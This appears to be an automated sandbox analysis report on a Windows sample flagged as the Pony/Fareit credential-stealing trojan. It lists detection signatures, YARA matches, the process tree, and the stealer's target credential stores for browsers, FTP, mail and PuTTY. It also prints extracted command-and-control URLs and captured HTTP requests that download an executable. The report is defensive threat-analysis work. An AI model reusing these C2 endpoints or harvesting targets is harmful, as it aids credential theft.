Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BW38j8Jkbl.exe

Overview

General Information

Sample name:BW38j8Jkbl.exe
renamed because original name is a hash value
Original sample name:2392a10406f41b602acbbdbbb24e0ff7.exe
Analysis ID:1430559
MD5:2392a10406f41b602acbbdbbb24e0ff7
SHA1:9428ec3da5621a909d6cfc52ce3c6297aa97e8bb
SHA256:b593466df2eb855e58671d6f361c691e4be0f638f1fa17166965e613927684ea
Tags:exePony
Infos:

Detection

Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Generic Dropper
Yara detected Pony
C2 URLs / IPs found in malware configuration
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Machine Learning detection for sample
Pony trojan / infostealer detected
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BW38j8Jkbl.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\BW38j8Jkbl.exe" MD5: 2392A10406F41B602ACBBDBBB24E0FF7)
    • BW38j8Jkbl.exe (PID: 5904 cmdline: "C:\Users\user\Desktop\BW38j8Jkbl.exe" MD5: 2392A10406F41B602ACBBDBBB24E0FF7)
      • cmd.exe (PID: 6824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
{"C2 list": ["http://smartoffice-eg.com/include/rili/gate.php", "http://smartoffice-eg.com/include/rili/shit.exe"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PonyYara detected PonyJoe Security
      00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
      • 0x1660c:$a1: \Global Downloader
      • 0x15d95:$a2: wiseftpsrvs.bin
      • 0x1646c:$a3: SiteServer %d\SFTP
      • 0x16460:$a4: %s\Keychain
      • 0x166ca:$a5: Connections.txt
      • 0x16a11:$a6: ftpshell.fsi
      • 0x1716c:$a7: inetcomm server passwords
      00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
      • 0x14f97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x171b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x147b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0x14dda:$s3: POST %s HTTP/1.0
      • 0x14e03:$s4: Accept-Encoding: identity, *;q=0
      • 0x14f10:$s4: Accept-Encoding: identity, *;q=0
      00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpFareitFareit Payloadkevoreilly
      • 0x17402:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
      Click to see the 14 entries
      SourceRuleDescriptionAuthorStrings
      0.2.BW38j8Jkbl.exe.4296000.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        0.2.BW38j8Jkbl.exe.4296000.1.unpackFareitFareit Payloadkevoreilly
        • 0x14202:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
        1.2.BW38j8Jkbl.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          1.2.BW38j8Jkbl.exe.400000.0.raw.unpackJoeSecurity_PonyYara detected PonyJoe Security
            1.2.BW38j8Jkbl.exe.400000.0.raw.unpackWindows_Trojan_Pony_d5516fe8unknownunknown
            • 0x1660c:$a1: \Global Downloader
            • 0x15d95:$a2: wiseftpsrvs.bin
            • 0x1646c:$a3: SiteServer %d\SFTP
            • 0x16460:$a4: %s\Keychain
            • 0x166ca:$a5: Connections.txt
            • 0x16a11:$a6: ftpshell.fsi
            • 0x1716c:$a7: inetcomm server passwords
            Click to see the 12 entries
            No Sigma rule has matched
            Timestamp:04/23/24-21:47:30.497908
            SID:2014562
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: BW38j8Jkbl.exeAvira: detected
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://smartoffice-eg.com/include/rili/gate.php", "http://smartoffice-eg.com/include/rili/shit.exe"]}
            Source: BW38j8Jkbl.exeReversingLabs: Detection: 79%
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
            Source: BW38j8Jkbl.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,1_2_0040A712
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,1_2_0040D3BE
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,1_2_0040BC36
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,757283B0,1_2_0040A557
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,1_2_0040A96D
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,1_2_0040CE3D
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,1_2_0040AB24
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004043DC CryptUnprotectData,LocalFree,1_2_004043DC
            Source: BW38j8Jkbl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_2_004051E3
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_004041A6
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00404E73
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00408AE5
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00409832
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00408961
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

            Networking

            barindex
            Source: TrafficSnort IDS: 2014562 ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 192.168.2.4:49730 -> 144.76.41.117:80
            Source: Malware configuration extractorURLs: http://smartoffice-eg.com/include/rili/gate.php
            Source: Malware configuration extractorURLs: http://smartoffice-eg.com/include/rili/shit.exe
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: global trafficHTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
            Source: global trafficHTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
            Source: global trafficHTTP traffic detected: GET /include/rili/shit.exe HTTP/1.0Host: smartoffice-eg.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
            Source: BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
            Source: BW38j8Jkbl.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: unknownDNS traffic detected: queries for: smartoffice-eg.com
            Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
            Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
            Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://smartoffice-eg.com/include/rili/gate.php
            Source: BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD
            Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://smartoffice-eg.com/include/rili/shit.exe
            Source: BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: BW38j8Jkbl.exe, 00000001.00000003.1802833837.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://smartoffice-eg.com/include/rili/shit.exe
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

            System Summary

            barindex
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
            Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
            Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit Payload Author: kevoreilly
            Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit Payload Author: kevoreilly
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
            Source: Signatures Results: All Signatures
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004121E91_2_004121E9
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00402EFD1_2_00402EFD
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: String function: 00404351 appears 51 times
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: String function: 00401D71 appears 139 times
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: String function: 00410808 appears 42 times
            Source: BW38j8Jkbl.exe, 00000000.00000000.1709686609.000000000049A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
            Source: BW38j8Jkbl.exe, 00000001.00000000.1784937920.000000000049A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
            Source: BW38j8Jkbl.exeBinary or memory string: OriginalFilenameMesode7.exe vs BW38j8Jkbl.exe
            Source: BW38j8Jkbl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
            Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
